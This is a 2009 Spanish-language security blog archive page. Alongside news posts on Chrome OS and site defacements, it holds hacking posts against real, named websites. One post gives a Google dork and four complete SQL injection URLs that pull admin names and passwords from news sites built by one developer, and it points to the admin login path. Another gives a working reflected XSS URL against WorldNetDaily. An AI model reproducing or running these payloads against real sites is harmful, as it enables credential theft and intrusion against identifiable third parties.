Archivo

Archivo para la Categoría "Seguridad"

Chrome OS libre de virus?

julio 24, 2009 1 Comentario

chrome

El proximo sistema operativo de Google eliminara
definitivamente el problema de los virus informaticos, asegura el director de ingenieria de la companiia.

Diario Ti: El director de ingenieria de Google, Linus Upson, declaro en una entrevista con la publicacion New Scientist, que el anunciado sistema operativo Chrome OS dejara en la obsolescencia a los codigos malignos actuales.

“Hemos rediseniado la arquitectura subyacente de seguridad de una manera tan radical, que los usuarios ya no tendran que preocuparse por los virus, el malware ni las actualizaciones de seguridad. El sistema sencillamente funcionara”, declaro Upson.

El sistema operativo Chrome OS estara basado en un kernel Liux, pero al contrario que los sistemas operativos tradicionales, la mayor parte de los procesos seran ejecutados en la nube. De esa forma, un numero considerablemente inferior de elementos deberan ser descargados a la computadora personal del usuario. Segun Linus Upson, esta caracteristica beneficiara, sin duda alguna, la seguridad informatica.

En la entrevista, Upson indica que las descargas siempre iran uno o dos pasos detras del acceso basado en la nube, debido a que toma tiempo descargar las actualizaciones de
instalarlas en el PC.

Paul Jackson, analista de Forrester Research, coincidio con lo anterior senialando que “la nube siempre parcheara con mayor rapidez”. Con todo, Jackson no coincide del todo con la categorica afirmacion de Upson, en el sentido que los usuarios de Chrome OS de grandes preocuparse totalmente de los virus. Al respecto, Jackson senialo que el sistema operativo de Google sera inevitablemente vulnerable a los ataques realizados contra el navegador, o contra el kernel de Linux.

Fuente: ArgentinaSecurity

Categorías:Seguridad, Uncategorized

IMAGESHACK OWNED

julio 17, 2009 Deja un comentario

They decided to hack imageshack to bring attention to some security flaw which they allege was allowed to exist by security software providers fully disclosing the weakness. I do know the word “Script Kiddies” means inexperienced punks who often literally copy/paste code–IE the opposite of a true hacker who knows how a system works to find a weakness. I guess these guys are saying even some amateurs could do serious damage.

imageshack

“In the end, more than freedom, they wanted security. They wanted a comfortable life, and they lost it all – security, comfort, and freedom. When the Athenians finally wanted not to give to society but for society to give to them, when the freedom they wished for most was freedom from responsibility, then Athens ceased to be free and was never free again.” –Edward Gibbon

http://antisec.wordpress.com/

Categorías:Owned, Seguridad Etiquetas: , ,

Hackean la página oficial del padrón electoral nacional

junio 27, 2009 2 comentarios

onetwo

En el día en que comenzo la veda electoral la pagina oficial del padron electoral nacional (www.padrones.gov.ar) fue modificada en algunos de sus contenidos (ver en la foto) Con ofensas para la Capital y Buenos Aires.

El bug del sitio perteneciente al poder judicial de la nación fue rapidamente fixeado por sus administradores. Pero aun asi no han podido evitar que durante algunos minutos apareciera la palabra “chorros” pegada a Capital y “ladrones” a la de Buenos Aires.

Categorías:Noticias, Seguridad

Bug SQL inj en algunas de las webs de http://webapps.com.mx/. By N3xtdoor

junio 23, 2009 Deja un comentario

Retomando el blog, me he topado en un foro amigo un buen bug descubierto por n3xtdoor.

Link de la desarrolladora: http://webapps.com.mx/.

Un dork puede ser…este> inurl:.Notas.php?IdNota=

Siempre la tabla sera USERS, y las columnas name y pass.

Ejemplos de webs:

http://www.lapuertanoticias.com/notas.php?IDNOTA=-1+union+select+0,1,2,3,concat(name,0x3a,pass),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77+from+USERS–

http://www.arrobajuarez.com/notas.php?IDNOTA=-1+union+select+0,1,2,3,4,5,6,concat(name,0x3a,pass),8,9,10,11,12,13,14,15,16,17,18,19+from+USERS–

http://www.eldiariodechihuahua.com/notas.php?IDNOTA=-1+union+select+0,1,2,3,4,5,6,concat(name,0x3a,pass),8,9,10,11,12,13,14,15,16,17,18,19+from+USERS–

http://www.noticiasenlinea.com/notas.php?IDNOTA=-1+union+select+0,1,2,3,concat(name,0x3a,pass),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58+from+USERS–

Admin panel: /editor/login.php

Argentina security

Categorías:Bugs, Seguridad Etiquetas: , , ,

Worldnetdaily XSS vulnerabilities

mayo 30, 2009 Deja un comentario

world_net_daily_logo-708219

WorldNetDaily (WND) is a conservative American journalism website founded in May 1997 with the stated intentions of “exposing wrongdoing, corruption and abuse of power.

Dork: inurl:index.php?fa=

http://www.worldnetdaily.com/index.php?fa=%22%3E%3Cscript%3Ealert(/xss/)%3C/script%3E

Nota: Dominios y subdominios de la WND afectados por este bug.

Categorías:Seguridad, XSS Etiquetas: ,

www.buenosaires.gov.ar [XSS]

mayo 29, 2009 Deja un comentario

Así es, Tal como lo dice el titulo la web principal del gobierno de nuestro pais esta vulnerable a XSS, verdaderamente una verguenza ya que este bug es estupido y no puede encontrarse en la web principal de la pagina del gobierno Argentino.

dejo mirror del xss que fue hallado por un colega de mi team.

http://xssed.com/mirror/59202

Categorías:Seguridad, XSS
Seguir

Get every new post delivered to your Inbox.